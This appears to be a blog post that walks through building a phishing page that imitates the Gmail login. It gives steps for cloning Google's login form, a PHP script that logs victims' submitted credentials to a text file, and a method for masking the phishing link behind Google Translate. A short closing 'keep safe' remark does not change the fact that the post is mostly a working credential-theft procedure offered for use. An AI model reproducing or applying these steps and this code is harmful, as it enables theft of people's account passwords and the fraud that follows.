It also plays on human psychology, because the domain appears to be a trusted one that you would visit rather regularly. This kind of phishing allows people to steal credentials in plain-text, and by using this method, said hackers likely do so without anyone realizing.
Requirements
- A webhosting account
- Cpanel access to the webhost
Step 1 Create a Gmail Phishing Page
First, we need to make a phishing page to prepare.- Open up a text document using notepad, or your choice in text editors.
- Go to the Google login page.
- Right-click somewhere on the page, and click View page source.
- Copy all of the contents of the source code and paste them into your text document.
- Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
- Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
- Make a new text file, and paste the below as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
<?php
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> - Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
- Log in to your hosting account, and upload both files to the root of your website (not in a folder).
- When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.
Step 2 Manipulating Google
How exactly does the manipulation work behind this? Google Translator. Google translator has a vulnerability that if an attacker creates a fake gmail login page and then translates it with the tool, they would get a perfectly crafted link masked by Google itself. Check out this URL for an example of a phishing page that was created and then masked after using the translation tool.This fools users into thinking the page is legit. I mean, look at the URL:
- Go to Google translate.
- Translate your page from a different language into English.
- Click the link and test.
See how frighteningly easy it is to manipulate a website even as large as Google? Keep safe by always analyzing that URL.
#!13lackD3M0n
No comments:
Post a Comment